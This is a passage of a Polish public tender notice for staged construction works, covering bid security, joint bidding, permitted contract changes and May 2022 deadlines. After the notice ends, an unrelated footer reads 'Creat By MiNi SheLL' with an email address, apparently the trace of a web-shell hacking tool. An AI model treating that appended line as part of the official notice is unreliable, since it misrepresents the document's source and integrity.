podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem <br/>dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, <br/>o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego <br/>roboty budowlane zostały wykonane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest <br/>w stanie uzyskać tych dokumentów - inne odpowiednie dokumenty – w zakresie potwierdzającym <br/>spełnianie warunku, o którym mowa w pkt. 11.1.4.2. SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> W postępowaniu o udzielenie zamówienia Zamawiający nie żąda przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> nie dotyczy <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 16.1. Oferta powinna być zabezpieczona wadium w wysokości: 55 000 zł (słownie: pięćdziesiąt pięć tysięcy <br/>złotych 00/100)<br/>16.2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu <br/>związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/>16.3. Wadium wnosi się w następujących formach:<br/>16.3.1. pieniądzu,<br/>16.3.2. gwarancjach bankowych,<br/>16.3.3. gwarancjach ubezpieczeniowych,<br/>16.3.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 <br/>listopada 2000 roku – o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2019 r. poz. <br/>310, 836, 1572).<br/>16.4. Uwaga: Wadium wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia <br/>bankowego powinno zawierać następujące elementy:<br/>16.4.1. określenie terminu obowiązywania poręczenia lub gwarancji przez cały okres związania ofertą;<br/>16.4.2. określenie kwoty poręczenia lub gwarancji;<br/>16.4.3. wskazanie gwaranta poręczenia lub gwarancji;<br/>16.4.4. wskazanie beneficjenta poręczenia lub gwarancji;<br/>16.4.5. zapis, iż poręczyciel / gwarant zobowiązuje się bezwarunkowo tj. na pierwsze żądanie, do zapłaty pełnej <br/>kwoty zabezpieczenia na rzecz beneficjenta,<br/>16.4.6. nieodwołalność poręczenia lub gwarancji,<br/>16.5. W przypadku wniesienia wadium w formie pieniężnej należy je wpłacić przelewem na konto Zamawiającego:<br/>Nazwa banku: BSR Kraków o/Wojnicz<br/>Numer konta: 70 8589 0006 0010 0000 0202 0013<br/>powołując się na nazwę postępowania, nr sprawy oraz podając nazwę banku i numer swojego konta, <br/>na które należy zwrócić wadium.<br/>16.6. Za skuteczne wniesione wadium w pieniądzu, Zamawiający uważa wadium, które w oznaczonym terminie <br/>(przed upływem terminu składania ofert lub wniosków) znajdzie się na rachunku bankowym Zamawiającego <br/>(decyduje data uznania rachunku Zamawiającego).<br/>16.7. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, Wykonawca przekazuje zamawiającemu <br/>oryginał gwarancji lub poręczenia, w postaci elektronicznej.<br/>16.8. Zamawiający dopuszcza złożenie wadium w kilku formach przy jednoczesnym spełnieniu powyższych <br/>obowiązków. <br/>16.9. Zasady zwrotu i zatrzymania wadium określa PZP.<br/>14<br/>16.10. Złożenie przez Wykonawcę wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 PZP powoduje, <br/>powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego prawa do korzystania ze <br/>środków ochrony prawnej, o których mowa w dziale IX PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 11.2. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia:<br/>11.2.1. Szczególny sposób spełniania przez takich Wykonawców warunków udziału w postępowaniu: <br/>Zamawiający nie określa.<br/>11.2.2. Wykonawcy tacy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia <br/>publicznego. Wszelka korespondencja prowadzona będzie wyłącznie z pełnomocnikiem.<br/>11.2.3. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, <br/>o którym mowa w pkt. 11.1.2 SWZ. jest spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie <br/>ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności <br/>gospodarczej lub zawodowej i zrealizuje roboty budowlane, dostawy lub usługi, do których realizacji te <br/>uprawnienia są wymagane.<br/>11.2.4. Do Wykonawców takich stosuje się odpowiednio przepisy dotyczące Wykonawcy <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający przewiduje możliwość wprowadzenia istotnych zmian postanowień zawartych w umowie w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadkach określonych w obowiązujących przepisach oraz w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych poniżej, z uwzględnieniem wnioskowanych warunków ich wprowadzenia. Wszystkie poniższe postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody. <br/><br/>Dopuszczalna zmiana przedmiotu umowy;<br/>Dopuszczalna zmiana innych postanowień Umowy;<br/>Dopuszczalna zmiana terminu wykonania Umowy:<br/>Dopuszczalna zmiana harmonogramu;<br/>Dopuszczalna zmiana wysokości wynagrodzenia;<br/>Sposób zmiany wynagrodzenia<br/><br/>Szczegółowe informacje w powyższym zakresie zostały określone w załączniku nr 3 do SWZ - projektowane postanowienia umowne w paragrafie 14 <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-05-16 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">miniportal</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-05-16 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-06-14</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> 8.	TERMIN WYKONANIA ZAMÓWIENIA:<br/>8.1.	Zamawiający wymaga, aby całe zamówienie zostało wykonane i zgłoszone do odbioru w terminie 13 miesięcy od dnia podpisania umowy z Wykonawcą z zastrzeżeniem następujących etapów wykonania zamówienia:<br/>8.1.1.	etap I – faktycznie wykonane roboty budowalne do wartości wkładu własnego Zamawiającego - zgłoszenie do odbioru częściowego nie wcześniej niż po 3 miesiącach i nie później niż po 4 miesiącach od dnia podpisania umowy z Wykonawcą;<br/>8.1.2.	etap II – realizacja robót o wartości min. 45% max. 50% wartości dofinansowania z Rządowego Funduszu Polski Ład: Program Inwestycji Strategicznych – zgłoszenie do odbioru częściowego nie wcześniej niż po 7 miesiącach i nie później niż po 8 miesiącach od dnia podpisania umowy z Wykonawcą;<br/>8.1.3.	etap III – realizacja pozostałych prac objętych przedmiotem zamówienia – zgłoszenie do odbioru końcowego nie wcześniej niż po upływie 12 miesięcy jednak nie później niż w terminie 13 miesięcy od dnia podpisania umowy z Wykonawcą.

Creat By MiNi SheLL
Email: jattceo@gmail.com